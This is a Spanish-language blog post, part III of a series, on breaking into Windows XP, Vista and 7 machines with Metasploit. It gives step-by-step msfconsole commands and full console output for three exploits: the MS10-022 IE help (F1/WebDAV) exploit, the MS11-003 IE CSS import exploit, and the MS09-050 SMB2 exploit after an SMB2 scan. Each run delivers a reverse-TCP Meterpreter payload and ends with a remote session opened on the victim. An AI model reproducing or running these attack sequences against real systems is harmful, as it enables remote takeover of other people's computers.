Inicio > Hacking, MetaSploit > Penetrando Sistemas Windows con MetaSploit FrameWork – Parte III

Penetrando Sistemas Windows con MetaSploit FrameWork – Parte III


CONCEPTOS DE PENETRACION EN MAQUINAS BAJO PLATAFORMA WINDOWS XP/VISTA/7 USANDO METASPLOIT FRAMEWORK – Parte III

EXPLOIT EN HELP INTERNET EXPLORER

Se trata de una vulnerabilidad que intenta explotar un fallo en las DLL correspondientes a la ayuda de Internet Explorer 6.0 y 7.0 cuando presiona la tecla “F1” en el navegador, dado que este intenta cargar y usar un fichero HLP desde un SMB o WebDAV.

En este caso, este exploit utiliza WebDAV que proveerá un fichero HLP al igual que un payload ejecutable con extensión EXE.

msf (use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32) > show options
Module options (exploit/windows/browser/ms10_022_ie_vbscript_winhlp32):Name Current Setting Required Description—- ————— ——– ———–

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 80 yes The daemon port to listen on

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH / yes The URI to use.

Exploit target:

Id Name

– —-

0 Automatic

msf exploit(ms10_022_ie_vbscript_winhlp32) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms10_022_ie_vbscript_winhlp32) > set LHOST 192.168.1.34

LHOST => 192.168.1.34

msf exploit(ms10_022_ie_vbscript_winhlp32) > set LPORT 4442

LPORT => 4442

msf exploit(ms10_022_ie_vbscript_winhlp32) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.34:4442

[*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://192.168.1.34:80/

[*] Server started.

msf exploit(ms10_022_ie_vbscript_winhlp32) >

[*] Request for “/” does not contain a sub-directory, redirecting to /0iiODtjduwnI55j/ …

[*] Responding to GET request from 192.168.1.38:1147

[*] Using \\192.168.1.34iiODtjduwnI55j\3Kvds7tHD9.hlp …

[*] Sending HTML page to 192.168.1.38:1147…

[*] Request for “/” does not contain a sub-directory, redirecting to /00R44RaUF2kyMz/ …

[*] Responding to GET request from 192.168.1.38:1147

[*] Using \\192.168.1.340R44RaUF2kyMz\QFrKqNnLpDU.hlp …

[*] Sending HTML page to 192.168.1.38:1147…

[*] Request for “/” does not contain a sub-directory, redirecting to /aATcKpBkDGXspEA/ …

[*] Responding to WebDAV OPTIONS request from 192.168.1.38:1151

[*] Request for “/00R44RaUF2kyMz” does not contain a sub-directory, redirecting to /00R44RaUF2kyMz/ …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending directory multistatus for /00R44RaUF2kyMz/ …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending HLP multistatus for /00R44RaUF2kyMz/QFrKqNnLpDU.hlp …

[*] Responding to GET request from 192.168.1.38:1151

[*] Sending HLP to 192.168.1.38:1151…

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/QFrKqNnLpDU.ANN …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/QFrKqNnLpDU.GID …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/QFrKqNnLpDU.CNT …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/QFrKqNnLpDU.FTG …

[*] Request for “/00R44RaUF2kyMz” does not contain a sub-directory, redirecting to /00R44RaUF2kyMz/ …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending directory multistatus for /00R44RaUF2kyMz/ …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/QFrKqNnLpDU.TMP …

[*] Request for “/00R44RaUF2kyMz” does not contain a sub-directory, redirecting to /00R44RaUF2kyMz/ …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending directory multistatus for /00R44RaUF2kyMz/ …

[*] Sending 404 for PUT /00R44RaUF2kyMz/QFrKqNnLpDU.TMP …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending EXE multistatus for /00R44RaUF2kyMz/calc.exe …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/shell32.dll …

[*] Request for “/00R44RaUF2kyMz” does not contain a sub-directory, redirecting to /00R44RaUF2kyMz/ …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending directory multistatus for /00R44RaUF2kyMz/ …

[*] Responding to GET request from 192.168.1.38:1151

[*] Sending EXE to 192.168.1.38:1151…

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/rsaenh.dll …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/%1 …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/calc.exe.Manifest …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/calc.exe.Local …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/WSOCK32.dll …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/WS2_32.dll …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/WS2HELP.dll …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/hnetcfg.dll …

[*] Sending stage (749056 bytes) to 192.168.1.38

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/crypt32.dll …

[*] Meterpreter session 3 opened (192.168.1.34:4442 -> 192.168.1.38:1152) at Fri May 13 23:18:40 +0200 2011

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/IPHLPAPI.DLL …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/WINMM.dll …

[*] Received WebDAV PROPFIND request from 192.168.1.38:1151

[*] Sending 404 for /00R44RaUF2kyMz/PSAPI.DLL …

La víctima accede a la dirección donde se encuentra en ejecución el servicio de MetaSploit y posteriormente, visualiza un mensaje de VB Script indicándole que debe presionar la tecla “F1” una vez ha hecho esto, se intenta explotar esta vulnerabilidad y enviar el payload.

CSS RECURSIVE IMPORT

Se trata de una vulnerabilidad de corrupción de memoria incluida en el motor HTML de Microsoft (mshtml). Ocurre cuando se parsea una pagina que realiza importaciones CSS recursivas, donde un objeto (en C++) es eliminado y posteriormente utilizado, lo que lleva a una referencia de puntero nulo, este modulo funciona correctamente cuando en la maquina objetivo se encuentra instalado .NET 2.0.50727 y las versiones del IE 6, 7 y 8 son vulnerables.

msf exploit(psexec) > use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > show options
Module options (exploit/windows/browser/ms11_003_ie_css_import):Name Current Setting Required Description

—- ————— ——– ———–

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

—- ————— ——– ———–

EXITFUNC process yes Exit technique: seh, thread, none, process

LHOST 192.168.1.33 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

– —-

0 Automatic

msf exploit(ms11_003_ie_css_import) > set URIPATH /

URIPATH => /

msf exploit(ms11_003_ie_css_import) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.33:4444

[*] Using URL: http://0.0.0.0:8080/

[*] Local IP: http://192.168.1.33:8080/

[*] Server started.

Después de que el usuario intenta acceder a la ruta donde se encuentra el servicio a la espera de una nueva conexión:

msf exploit(ms11_003_ie_css_import) >[*] 192.168.1.34:49208 Received request for “/”[*] 192.168.1.34:49208 Sending windows/browser/ms11_003_ie_css_import redirect[*] 192.168.1.34:49208 Received request for “/BxMLL.html”

[*] 192.168.1.34:49208 Sending windows/browser/ms11_003_ie_css_import HTML

[*] 192.168.1.34:49208 Received request for “/generic-1305405045.dll”

[*] 192.168.1.34:49208 Sending windows/browser/ms11_003_ie_css_import .NET DLL

[*] 192.168.1.34:49209 Received request for “/favicon.ico”

[*] 192.168.1.34:49209 Sending windows/browser/ms11_003_ie_css_import CSS

[*] 192.168.1.34:49210 Received request for “/\356\200\240\341\201\232\356\200\240\341\201\232\356\200\240\341\201\232\356\200\240\341\201\232″

[*] 192.168.1.34:49210 Sending windows/browser/ms11_003_ie_css_import CSS

[*] Sending stage (749056 bytes) to 192.168.1.34

[*] Meterpreter session 1 opened (192.168.1.33:4444 -> 192.168.1.34:49211) at Sat May 14 22:30:51 +0200 2011

[*] Session ID 1 (192.168.1.33:4444 -> 192.168.1.34:49211) processing InitialAutoRunScript ‘migrate -f’

[*] Current server process: iexplore.exe (3276)

[*] Spawning a notepad.exe host process…

[*] Migrating into process ID 1436

[*] New server process: notepad.exe (1436)

VULNERABILIDAD EN SRV2.SYS

Vulnerabilidad encontrada principalmente en sistemas Windows 7, Vista SP1/SP2 y 2008 se trata de un problema en el proceso de validación de una petición SMB2 que no establece correctamente los limites de las variables incluidas en la función de validación, lo que permite al atacante ejecutar código arbitrario de forma local o remota.

Para determinar si un sistema es vulnerable a este tipo de ataque, se utiliza el escaner de metasploit correspondiente a SMB2

msf > use auxiliary/scanner/smb/smb2msf auxiliary(smb2) > set RHOSTS 192.168.1.34

RHOSTS => 192.168.1.34

msf auxiliary(smb2) > set THREADS 100

THREADS => 100

msf auxiliary(smb2) > run

[*] 192.168.1.34 supports SMB 2 [dialect 255.2] and has been online for 2 hours

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Determinada la versión del servicio SMB en la maquina objetivo se puede ejecutar el exploit con mayores probabilidades de éxito.

msf> use exploit/windows/smb/ms09_050_smb2_negotiate_func_index


msf exploit(ms09_050_smb2_negotiate_func_index) > show options

Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

Name Current Setting Required Description

—- ————— ——– ———–

RHOST 192.168.1.40 yes The target address

RPORT 445 yes The target port

WAIT 180 yes The number of seconds to wait for the attack to complete.

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

—- ————— ——– ———–

EXITFUNC thread yes Exit technique: seh, thread, none, process

LHOST 192.168.1.33 yes The listen address

LPORT 4448 yes The listen port

Exploit target:

Id Name

– —-

0 Windows Vista SP1/SP2 and Server 2008 (x86)

msf exploit(ms09_050_smb2_negotiate_func_index) > set LPORT 4452

LPORT => 4452

msf exploit(ms09_050_smb2_negotiate_func_index) > set WAIT 5

WAIT => 5

msf exploit(ms09_050_smb2_negotiate_func_index) > exploit

[*] Started reverse handler on 192.168.1.33:4452

[*] Connecting to the target (192.168.1.40:445)…

[*] Sending the exploit packet (872 bytes)…

[*] Waiting up to 5 seconds for exploit to trigger…

[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)

Una vez se ha cumplido el tiempo de espera se abre una sesión meterpreter.

  1. tonissh
    agosto 26, 2011 en 3:25 pm

    esta genial eso ke publicas, sigue asi

  1. No trackbacks yet.

Deja un comentario

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

Seguir

Recibe cada nueva publicación en tu buzón de correo electrónico.

Únete a otros 1.076 seguidores

A %d blogueros les gusta esto: